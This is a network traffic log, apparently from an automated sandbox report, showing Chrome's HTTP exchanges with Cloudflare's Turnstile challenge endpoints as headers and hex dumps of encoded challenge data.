                                                      2024-03-05 13:24:38 UTC1369INData Raw: 42 76 63 4f 6f 6f 6f 43 70 6e 63 53 59 7a 71 48 50 7a 4e 44 45 6a 5a 54 54 6b 63 76 4f 77 36 72 62 30 35 69 52 6d 39 4c 5a 32 37 48 61 30 73 62 4a 33 64 62 69 75 72 72 72 35 4f 72 76 7a 4e 7a 7a 74 4b 7a 55 79 76 54 4e 78 62 71 34 73 4c 58 74 76 62 54 5a 42 4e 7a 64 42 64 33 43 39 64 30 46 41 51 66 33 2f 41 6f 4f 44 75 48 79 31 41 67 56 34 66 67 45 48 42 6a 63 2b 77 6e 68 2b 65 37 33 48 65 50 64 4a 2f 37 6c 47 41 44 73 36 2b 55 69 38 42 4c 73 2f 69 63 49 4b 43 6b 73 2b 6a 41 4d 4f 69 6f 35 45 44 34 77 47 45 4a 41 2f 42 35 44 50 53 68 4b 4f 53 74 4f 55 44 38 4e 4a 53 70 4a 56 54 63 4f 4a 55 74 44 4f 7a 5a 50 54 45 6c 4f 4c 42 70 65 4a 44 42 52 48 6c 49 68 50 6c 78 4a 62 45 42 78 55 57 6f 2f 56 43 38 79 5a 55 64 78 63 48 51 35 5a 58 6c 39 55 6c 74 72 63 44
                                                      Data Ascii: BvcOoooCpncSYzqHPzNDEjZTTkcvOw6rb05iRm9LZ27Ha0sbJ3dbiurrr5OrvzNzztKzUyvTNxbq4sLXtvbTZBNzdBd3C9d0FAQf3/AoODuHy1AgV4fgEHBjc+wnh+e73HePdJ/7lGADs6+Ui8BLs/icIKCks+jAMOio5ED4wGEJA/B5DPShKOStOUD8NJSpJVTcOJUtDOzZPTElOLBpeJDBRHlIhPlxJbEBxUWo/VC8yZUdxcHQ5ZXl9UltrcD


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      18192.168.2.549732104.17.3.1844433472C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-03-05 13:24:41 UTC805OUTGET /cdn-cgi/challenge-platform/h/g/pat/85fa6d617a504235/1709645077930/05ec081f2474c7b76f8a6c143f0f205ebf76eece6eeae1272067e1746485a5f2/-9pEA90tLAniFfr HTTP/1.1
                                                      Host: challenges.cloudflare.com
                                                      Connection: keep-alive
                                                      Cache-Control: max-age=0
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: */*
                                                      Sec-Fetch-Site: same-origin
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/rdp8q/0x4AAAAAAADnPIDROrmt1Wwj/light/normal
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2024-03-05 13:24:41 UTC152INHTTP/1.1 401 Unauthorized
                                                      Date: Tue, 05 Mar 2024 13:24:41 GMT
                                                      Content-Type: text/plain; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      2024-03-05 13:24:41 UTC1374INData Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 42 65 77 49 48 79 52 30 78 37 64 76 69 6d 77 55 50 77 38 67 58 72 39 32 37 73 35 75 36 75 45 6e 49 47 66 68 64 47 53 46 70 66 49 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d 45 41 67
                                                      Data Ascii: www-authenticate: PrivateToken challenge=AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20gBewIHyR0x7dvimwUPw8gXr927s5u6uEnIGfhdGSFpfIAGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=, token-key=MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQMEAg
                                                      2024-03-05 13:24:41 UTC6INData Raw: 31 0d 0a 4a 0d 0a
                                                      Data Ascii: 1J
                                                      2024-03-05 13:24:41 UTC5INData Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      19192.168.2.549733104.17.3.1844433472C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-03-05 13:24:41 UTC487OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/1183635583:1709641629:fYb9hZweqxu5iZMV1wvhRAEVl-boZlvEU6H59iz174E/85fa6d617a504235/e4bc76bcbb19b36 HTTP/1.1
                                                      Host: challenges.cloudflare.com
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2024-03-05 13:24:41 UTC386INHTTP/1.1 400 Bad Request
                                                      Date: Tue, 05 Mar 2024 13:24:41 GMT
                                                      Content-Type: application/json
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                      cf-chl-out: B54w7c6uyEz5KGx3Z/u9zA==$y/CRbN7kDUq9h4fSM1ULeQ==
                                                      Server: cloudflare
                                                      CF-RAY: 85fa6d7f7fe272b7-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      2024-03-05 13:24:41 UTC12INData Raw: 37 0d 0a 69 6e 76 61 6c 69 64 0d 0a
                                                      Data Ascii: 7invalid
                                                      2024-03-05 13:24:41 UTC5INData Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      20192.168.2.549734104.17.3.1844433472C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-03-05 13:24:43 UTC776OUTGET /cdn-cgi/challenge-platform/h/g/i/85fa6d617a504235/1709645077934/5cNZbzk38vkU6ml HTTP/1.1
                                                      Host: challenges.cloudflare.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                      Sec-Fetch-Site: same-origin
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: image
                                                      Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/rdp8q/0x4AAAAAAADnPIDROrmt1Wwj/light/normal
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2024-03-05 13:24:43 UTC208INHTTP/1.1 200 OK
                                                      Date: Tue, 05 Mar 2024 13:24:43 GMT
                                                      Content-Type: image/png
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Server: cloudflare
                                                      CF-RAY: 85fa6d8a5dc5429e-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      2024-03-05 13:24:43 UTC67INData Raw: 33 64 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 53 00 00 00 2a 08 02 00 00 00 40 fd f0 5e 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82 0d 0a
                                                      Data Ascii: 3dPNGIHDRS*@^IDAT$IENDB`
                                                      2024-03-05 13:24:43 UTC5INData Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      21192.168.2.549736104.17.3.1844433472C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-03-05 13:24:44 UTC918OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/1183635583:1709641629:fYb9hZweqxu5iZMV1wvhRAEVl-boZlvEU6H59iz174E/85fa6d617a504235/e4bc76bcbb19b36 HTTP/1.1
                                                      Host: challenges.cloudflare.com
                                                      Connection: keep-alive
                                                      Content-Length: 29367
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      Content-type: application/x-www-form-urlencoded
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      CF-Challenge: e4bc76bcbb19b36
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: */*
                                                      Origin: https://challenges.cloudflare.com
                                                      Sec-Fetch-Site: same-origin
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/rdp8q/0x4AAAAAAADnPIDROrmt1Wwj/light/normal
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2024-03-05 13:24:44 UTC16384OUTData Raw: 76 5f 38 35 66 61 36 64 36 31 37 61 35 30 34 32 33 35 3d 61 4c 49 4f 57 66 4b 55 72 54 49 4b 49 66 70 63 6e 25 32 62 7a 2b 32 65 69 70 35 2b 77 63 48 2b 4f 4f 66 49 4b 48 2b 31 4f 69 4c 66 79 4b 2b 64 66 2b 63 53 7a 51 2b 79 44 2b 62 4f 49 4c 4b 70 6d 2b 68 4f 65 70 2b 73 72 33 2b 4b 31 2b 59 34 72 2b 6b 4f 59 45 70 72 4f 70 49 2b 64 70 35 49 2b 37 52 2b 36 33 53 78 2b 6b 4f 66 55 77 47 4f 65 77 2b 45 4f 66 35 5a 6f 6a 2b 36 34 6d 65 79 4f 2b 55 2b 41 5a 6e 4f 4f 2b 63 65 2b 63 37 49 2b 63 34 66 69 4f 63 6d 2b 66 4c 4c 72 4f 66 62 69 7a 49 66 65 2b 63 79 51 62 46 7a 35 46 65 33 55 2b 54 42 78 46 56 7a 72 51 49 2b 33 7a 42 49 4d 64 52 79 72 51 4c 2b 7a 77 69 66 6c 4f 63 6a 45 6d 45 66 2b 5a 4e 70 4b 35 35 4e 2b 31 5a 4e 6b 53 49 50 30 34 38 61 44 34 35 66
                                                      Data Ascii: v_85fa6d617a504235=aLIOWfKUrTIKIfpcn%2bz+2eip5+wcH+OOfIKH+1OiLfyK+df+cSzQ+yD+bOILKpm+hOep+sr3+K1+Y4r+kOYEprOpI+dp5I+7R+63Sx+kOfUwGOew+EOf5Zoj+64meyO+U+AZnOO+ce+c7I+c4fiOcm+fLLrOfbizIfe+cyQbFz5Fe3U+TBxFVzrQI+3zBIMdRyrQL+zwiflOcjEmEf+ZNpK55N+1ZNkSIP048aD45f
                                                      2024-03-05 13:24:44 UTC12983OUTData Raw: 2b 59 78 69 56 4b 59 4f 50 35 46 53 66 4d 67 71 74 58 4b 53 4b 34 2b 56 2b 6b 2b 31 6d 63 36 6d 6f 2b 63 4f 63 43 4f 76 53 66 34 63 35 56 67 78 59 4f 63 41 2b 4a 72 36 78 4b 55 2b 52 4f 66 2b 66 66 2b 6c 41 31 49 2b 6a 2b 42 4c 66 2b 4b 54 2b 79 4f 4b 72 63 37 2b 35 2b 36 4f 63 43 4f 73 4c 54 34 66 62 2b 67 4f 65 2b 63 6e 2b 34 4f 77 4c 4b 48 2b 6d 2b 54 68 7a 4d 53 49 72 36 4a 4c 53 2b 38 4d 68 36 2b 44 2b 76 2b 70 4f 63 72 2b 6d 2b 2b 6f 4b 4c 78 77 4f 49 72 66 42 4f 50 78 31 36 66 55 2b 41 61 58 2b 59 70 2b 77 2b 46 78 63 76 2b 64 35 4e 49 4b 6a 2b 66 4f 36 43 2b 34 4b 6d 4f 63 34 66 6a 2b 4b 4f 43 4f 65 62 2b 65 4f 63 34 63 69 4b 75 2b 59 54 63 33 2b 50 2b 62 2b 4b 70 2b 61 55 31 36 4b 4e 78 4d 4f 65 52 66 45 4f 79 4f 71 67 78 30 53 65 70 2b 4f 63 35
                                                      Data Ascii: +YxiVKYOP5FSfMgqtXKSK4+V+k+1mc6mo+cOcCOvSf4c5VgxYOcA+Jr6xKU+ROf+ff+lA1I+j+BLf+KT+yOKrc7+5+6OcCOsLT4fb+gOe+cn+4OwLKH+m+ThzMSIr6JLS+8Mh6+D+v+pOcr+m++oKLxwOIrfBOPx16fU+AaX+Yp+w+Fxcv+d5NIKj+fO6C+4KmOc4fj+KOCOeb+eOc4ciKu+YTc3+P+b+Kp+aU16KNxMOeRfEOyOqgx0Sep+Oc5
                                                      2024-03-05 13:24:44 UTC327INHTTP/1.1 200 OK
                                                      Date: Tue, 05 Mar 2024 13:24:44 GMT
                                                      Content-Type: text/plain; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      cf-chl-gen: C0Abyo9yOtmMtMqw3Ui8v0GPY1J/ARwrxQU0DPpDA86zBBXDqqJ5DQZlXz0Xxrp5$2NbxXY0Hn9kJ9D3wI+Z1aw==
                                                      Server: cloudflare
                                                      CF-RAY: 85fa6d90383942de-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      2024-03-05 13:24:44 UTC1042INData Raw: 34 61 38 38 0d 0a 70 6e 61 4b 6c 72 43 34 6a 5a 5a 38 73 4b 47 76 66 34 6a 46 78 6f 4f 2b 68 34 37 4b 73 70 2f 4f 76 4d 79 6a 30 73 43 6e 74 4c 53 38 76 61 65 65 6d 71 43 68 31 4e 76 64 75 39 6a 54 6f 72 2b 6f 33 2b 4c 73 35 75 37 4c 7a 63 54 51 77 65 7a 57 78 2f 58 7a 38 37 6e 33 75 66 6a 50 34 4f 38 45 74 74 48 35 34 64 30 4b 31 2b 66 32 35 75 76 50 33 66 4c 73 2b 38 77 41 37 66 4d 55 37 64 44 75 47 39 77 55 2b 74 6a 77 45 50 6e 32 34 75 4d 67 46 68 38 65 4b 42 6b 59 49 79 55 4a 48 43 51 41 49 51 63 4e 43 43 7a 32 45 76 6f 79 50 54 55 5a 49 50 6b 36 4d 68 34 69 49 42 73 69 4a 6b 6f 70 41 79 70 44 53 79 51 63 43 56 51 69 44 42 56 4e 55 56 70 5a 54 44 6b 37 57 6a 34 36 54 79 73 32 52 6b 34 65 4b 44 52 65 4a 57 59 6f 58 32 45 6e 52 55 30 75 4b 6b 70 43 64
                                                      Data Ascii: 4a88pnaKlrC4jZZ8sKGvf4jFxoO+h47Ksp/OvMyj0sCntLS8vaeemqCh1Nvdu9jTor+o3+Ls5u7LzcTQwezWx/Xz87n3ufjP4O8EttH54d0K1+f25uvP3fLs+8wA7fMU7dDuG9wU+tjwEPn24uMgFh8eKBkYIyUJHCQAIQcNCCz2EvoyPTUZIPk6Mh4iIBsiJkopAypDSyQcCVQiDBVNUVpZTDk7Wj46Tys2Rk4eKDReJWYoX2EnRU0uKkpCd
                                                      2024-03-05 13:24:44 UTC1369INData Raw: 69 4c 61 58 68 4c 66 46 69 4d 4f 6a 6d 72 37 4c 72 34 37 4e 77 36 4c 42 6c 4b 75 58 76 62 2b 39 6e 4e 4f 33 72 65 4c 63 78 75 4f 68 76 4e 76 6f 79 61 50 57 71 65 66 70 7a 2b 6a 71 36 62 62 70 35 4c 48 30 35 63 37 39 38 2f 6e 54 2f 75 2b 38 76 66 50 69 78 2f 6e 6b 39 2f 72 37 78 50 37 71 34 2b 6a 6d 37 39 77 54 36 75 2f 4b 30 51 67 5a 39 78 77 66 30 64 62 65 46 4f 44 36 32 78 66 6c 2f 67 55 6b 34 53 4c 74 47 4f 6b 53 36 51 48 71 43 44 63 4f 47 42 6b 37 4d 54 66 7a 46 68 55 76 48 2f 34 30 46 6b 55 33 50 53 67 71 51 79 77 72 54 6b 38 4d 50 54 41 36 55 79 67 51 49 42 55 75 4e 53 6f 72 53 31 34 35 46 30 74 4b 48 6c 59 57 4a 56 59 39 50 53 49 6e 57 32 74 56 4b 69 6c 78 4b 32 68 49 61 32 30 7a 55 33 41 34 56 31 52 6d 5a 55 5a 53 4e 6f 42 57 55 44 38 38 63 6e 31
                                                      Data Ascii: iLaXhLfFiMOjmr7Lr47Nw6LBlKuXvb+9nNO3reLcxuOhvNvoyaPWqefpz+jq6bbp5LH05c798/nT/u+8vfPix/nk9/r7xP7q4+jm79wT6u/K0QgZ9xwf0dbeFOD62xfl/gUk4SLtGOkS6QHqCDcOGBk7MTfzFhUvH/40FkU3PSgqQywrTk8MPTA6UygQIBUuNSorS145F0tKHlYWJVY9PSInW2tVKilxK2hIa20zU3A4V1RmZUZSNoBWUD88cn1
                                                      2024-03-05 13:24:44 UTC1369INData Raw: 71 57 4e 70 63 65 4a 6b 61 33 51 6f 4d 4c 4b 72 4a 54 52 76 63 72 62 7a 74 69 7a 6e 4c 54 68 70 4d 2f 65 34 63 4b 70 70 37 76 41 32 73 44 46 33 65 43 71 37 76 58 50 30 75 75 77 30 76 79 30 39 39 48 66 38 50 37 56 77 74 33 33 33 50 50 42 43 4f 73 43 33 50 6a 50 43 41 66 63 36 2f 77 52 35 38 37 73 46 52 67 45 45 67 33 6f 2f 76 48 5a 31 4f 45 53 33 67 49 44 42 51 4d 48 33 52 73 64 4b 43 76 37 43 43 34 50 38 79 38 50 49 6a 41 59 46 7a 41 5a 4c 53 73 30 51 52 78 45 4f 78 45 41 2f 41 64 46 48 78 38 64 52 30 49 70 48 44 4a 50 44 30 49 6b 52 79 68 50 51 55 6f 52 55 78 70 48 58 78 34 7a 47 6a 6b 65 54 79 56 59 56 55 68 44 57 32 78 63 58 53 31 6e 4f 30 63 7a 51 7a 46 75 56 33 42 6c 52 57 6c 36 4c 30 5a 56 66 6b 46 4e 55 34 52 76 50 47 39 57 55 55 5a 4c 52 46 64 48
                                                      Data Ascii: qWNpceJka3QoMLKrJTRvcrbztiznLThpM/e4cKpp7vA2sDF3eCq7vXP0uuw0vy099Hf8P7Vwt333PPBCOsC3PjPCAfc6/wR587sFRgEEg3o/vHZ1OES3gIDBQMH3RsdKCv7CC4P8y8PIjAYFzAZLSs0QRxEOxEA/AdFHx8dR0IpHDJPD0IkRyhPQUoRUxpHXx4zGjkeTyVYVUhDW2xcXS1nO0czQzFuV3BlRWl6L0ZVfkFNU4RvPG9WUUZLRFdH
                                                      2024-03-05 13:24:44 UTC1369INData Raw: 53 4d 7a 4b 79 73 6d 4d 33 58 6d 70 72 64 31 39 33 54 72 4e 6d 78 75 4b 2f 66 30 37 57 70 79 39 2f 50 6f 62 37 47 72 4f 66 79 72 36 37 41 73 36 2f 6a 38 2b 7a 4b 78 39 50 73 2f 4e 54 69 30 41 48 6a 32 66 6b 41 41 2b 41 4d 36 67 6a 4e 44 52 44 4c 36 75 38 45 7a 4f 6f 4b 36 65 76 37 47 2b 76 75 45 64 38 54 41 69 49 67 32 78 44 68 4a 41 48 36 34 2b 6b 59 34 41 55 70 45 77 51 4d 38 50 55 76 4c 44 6b 55 4f 54 4d 47 39 6a 67 30 43 51 30 50 4d 7a 41 7a 51 67 4d 2b 53 7a 73 66 49 43 5a 4a 49 53 77 72 4c 7a 4d 6e 54 43 49 55 57 68 45 6c 52 44 5a 53 47 6a 4e 4f 50 42 74 42 59 79 45 31 58 56 55 6b 59 6c 6f 6a 4e 6d 42 6c 4f 55 70 6b 61 48 4e 46 4e 45 39 69 4f 6d 56 4c 64 44 5a 64 54 44 31 57 63 56 31 46 65 6e 64 31 56 56 5a 31 61 6c 68 6b 56 34 64 79 54 49 6d 47 6c
                                                      Data Ascii: SMzKysmM3Xmprd193TrNmxuK/f07Wpy9/Pob7GrOfyr67As6/j8+zKx9Ps/NTi0AHj2fkAA+AM6gjNDRDL6u8EzOoK6ev7G+vuEd8TAiIg2xDhJAH64+kY4AUpEwQM8PUvLDkUOTMG9jg0CQ0PMzAzQgM+SzsfICZJISwrLzMnTCIUWhElRDZSGjNOPBtBYyE1XVUkYlojNmBlOUpkaHNFNE9iOmVLdDZdTD1WcV1Fend1VVZ1alhkV4dyTImGl
                                                      2024-03-05 13:24:44 UTC1369INData Raw: 49 32 74 6a 57 33 4e 48 65 6e 37 62 65 31 2b 44 56 6e 36 47 6e 32 64 33 69 72 64 6e 6c 37 75 37 48 77 2f 58 79 74 73 66 73 74 38 36 32 2b 2f 6a 35 32 77 4c 39 37 66 45 47 41 64 76 58 78 51 50 69 34 77 6f 4e 78 67 4d 43 30 68 4c 6b 30 64 58 71 41 78 59 54 37 2f 63 65 47 67 6f 4f 49 74 55 64 34 78 6b 6c 2b 79 72 69 4a 2f 37 6d 4c 43 6b 74 43 50 45 78 43 42 54 74 4d 53 48 72 4e 2f 6b 6d 50 76 30 37 4b 68 77 2b 51 44 34 2b 2f 6b 4d 67 50 7a 30 4c 4f 55 39 45 44 30 30 4d 54 42 49 6e 50 30 78 52 56 53 78 54 47 43 38 59 46 52 49 33 4d 57 4d 6a 55 6c 64 68 58 32 55 38 4b 6d 6c 41 62 32 45 69 62 55 51 77 63 47 35 69 4d 6e 42 6c 56 54 63 75 55 30 31 2f 50 32 35 7a 66 58 75 42 5a 45 4e 45 59 46 6d 46 53 45 4e 68 69 6b 31 44 6b 6f 39 51 5a 31 42 4e 56 47 79 50 6a 5a
                                                      Data Ascii: I2tjW3NHen7be1+DVn6Gn2d3irdnl7u7Hw/Xytsfst862+/j52wL97fEGAdvXxQPi4woNxgMC0hLk0dXqAxYT7/ceGgoOItUd4xkl+yriJ/7mLCktCPExCBTtMSHrN/kmPv07Khw+QD4+/kMgPz0LOU9ED00MTBInP0xRVSxTGC8YFRI3MWMjUldhX2U8KmlAb2EibUQwcG5iMnBlVTcuU01/P25zfXuBZENEYFmFSENhik1Dko9QZ1BNVGyPjZ
                                                      2024-03-05 13:24:44 UTC1369INData Raw: 33 64 32 69 6f 65 4f 37 32 65 6e 6f 35 64 58 6d 36 71 36 75 72 4f 33 64 34 62 62 79 38 63 75 7a 39 75 54 31 2f 76 72 35 38 62 30 41 31 2f 55 48 41 73 62 66 43 77 51 47 2f 63 55 4b 43 76 30 54 44 74 4c 39 47 42 55 52 45 74 45 58 46 75 2f 51 47 78 72 33 32 53 44 33 34 68 38 69 35 67 44 6a 4b 41 44 37 4c 69 30 61 37 75 77 73 4c 68 54 78 4d 6a 4c 79 38 6a 59 6d 4a 76 59 38 46 44 49 37 50 79 34 55 52 6b 49 79 4d 76 78 48 4e 69 67 50 54 43 4e 4b 43 31 45 2b 44 77 35 54 55 6a 52 62 57 55 59 62 46 6c 68 61 55 6d 4a 65 54 6a 67 69 5a 44 78 53 48 57 6c 6d 58 6d 64 73 52 43 38 75 62 31 34 7a 4d 58 4a 79 5a 6e 74 35 5a 58 59 36 66 57 70 51 50 6f 46 75 50 7a 36 46 67 6e 49 39 68 49 5a 36 53 6f 74 36 65 6b 32 50 66 6f 4a 4f 6b 6c 64 34 6b 35 64 62 69 6c 6d 62 64 48 43
                                                      Data Ascii: 3d2ioeO72eno5dXm6q6urO3d4bby8cuz9uT1/vr58b0A1/UHAsbfCwQG/cUKCv0TDtL9GBUREtEXFu/QGxr32SD34h8i5gDjKAD7Li0a7uwsLhTxMjLy8jYmJvY8FDI7Py4URkIyMvxHNigPTCNKC1E+Dw5TUjRbWUYbFlhaUmJeTjgiZDxSHWlmXmdsRC8ub14zMXJyZnt5ZXY6fWpQPoFuPz6FgnI9hIZ6Sot6ek2PfoJOkld4k5dbilmbdHC
                                                      2024-03-05 13:24:44 UTC1369INData Raw: 39 79 6f 6f 74 33 71 75 63 50 6c 71 2f 43 79 7a 2f 62 30 77 4f 6d 77 78 63 36 76 2b 2f 6a 74 74 37 6d 2f 38 66 58 36 30 73 62 37 32 67 6d 2b 78 77 45 4a 43 75 2f 4a 45 64 77 47 45 74 66 75 2b 4e 55 54 43 78 62 61 33 66 6e 67 38 68 30 6a 41 67 67 6c 32 76 67 6a 36 39 37 38 35 50 6b 71 4a 50 6f 44 4d 79 59 75 4e 41 49 75 4d 77 59 32 4d 7a 51 35 4c 7a 6f 37 50 79 34 63 51 68 63 66 4e 6b 63 57 52 55 59 48 54 54 6b 4a 50 52 35 4f 56 68 5a 56 4c 44 67 55 56 45 74 57 47 78 30 7a 48 54 56 63 55 79 35 55 4d 6a 74 65 62 44 70 56 4a 79 55 77 52 31 45 75 61 32 4e 71 4d 30 42 43 4f 55 74 30 5a 6c 78 2b 54 6d 70 42 56 49 42 78 63 6f 4e 53 63 59 4b 4d 68 57 61 50 68 49 6c 2f 68 6f 75 50 66 6c 4f 53 5a 32 47 4f 57 70 6c 77 6e 6c 6d 5a 64 49 43 6a 6e 4a 4f 65 59 32 56 37
                                                      Data Ascii: 9yoot3qucPlq/Cyz/b0wOmwxc6v+/jtt7m/8fX60sb72gm+xwEJCu/JEdwGEtfu+NUTCxba3fng8h0jAggl2vgj69785PkqJPoDMyYuNAIuMwY2MzQ5Lzo7Py4cQhcfNkcWRUYHTTkJPR5OVhZVLDgUVEtWGx0zHTVcUy5UMjtebDpVJyUwR1Eua2NqM0BCOUt0Zlx+TmpBVIBxcoNScYKMhWaPhIl/houPflOSZ2GOWplwnlmZdICjnJOeY2V7
                                                      2024-03-05 13:24:44 UTC1369INData Raw: 62 50 37 2b 79 78 72 36 79 31 35 4e 50 32 75 4c 6e 2b 38 37 33 38 34 4c 33 4d 38 64 63 44 78 4d 55 4c 41 38 62 34 44 77 44 4f 44 63 34 4b 30 2f 77 4b 7a 68 45 42 39 39 59 59 43 64 6f 5a 32 39 4c 66 46 74 58 73 42 53 63 68 4a 53 59 6c 36 43 6e 38 4b 65 72 6d 42 53 38 73 49 68 51 75 4d 79 48 79 4e 76 48 79 4a 76 6f 33 47 67 45 6b 51 66 59 33 41 67 4d 31 4b 55 6a 39 4f 6b 4e 4b 44 43 4d 51 44 45 31 43 44 41 34 55 52 6b 70 50 44 6a 42 54 46 52 4a 4b 47 42 35 64 50 45 39 67 4a 79 64 66 5a 57 52 71 58 6d 6b 77 62 6d 4e 69 4d 45 73 77 4b 58 52 6d 52 48 4d 75 54 33 39 76 50 6d 31 64 64 55 4a 78 63 34 5a 46 68 6c 31 4c 69 48 6c 6b 68 30 4a 6a 6b 34 35 54 6b 57 56 53 56 49 5a 74 6c 6c 6c 50 6e 31 6d 63 6a 5a 71 62 56 6e 65 6e 6f 32 53 57 6c 36 64 6e 6d 59 42 72 62
                                                      Data Ascii: bP7+yxr6y15NP2uLn+87384L3M8dcDxMULA8b4DwDODc4K0/wKzhEB99YYCdoZ29LfFtXsBSchJSYl6Cn8KermBS8sIhQuMyHyNvHyJvo3GgEkQfY3AgM1KUj9OkNKDCMQDE1CDA4URkpPDjBTFRJKGB5dPE9gJydfZWRqXmkwbmNiMEswKXRmRHMuT39vPm1ddUJxc4ZFhl1LiHlkh0Jjk45TkWVSVIZtlllPn1mcjZqbVneno2SWl6dnmYBrb


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      22192.168.2.549740104.17.3.1844433472C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-03-05 13:24:44 UTC428OUTGET /cdn-cgi/challenge-platform/h/g/i/85fa6d617a504235/1709645077934/5cNZbzk38vkU6ml HTTP/1.1
                                                      Host: challenges.cloudflare.com
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2024-03-05 13:24:44 UTC208INHTTP/1.1 200 OK
                                                      Date: Tue, 05 Mar 2024 13:24:44 GMT
                                                      Content-Type: image/png
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Server: cloudflare
                                                      CF-RAY: 85fa6d948a1318c8-EWR
                                                      alt-svc: h3=":443"; ma=86400
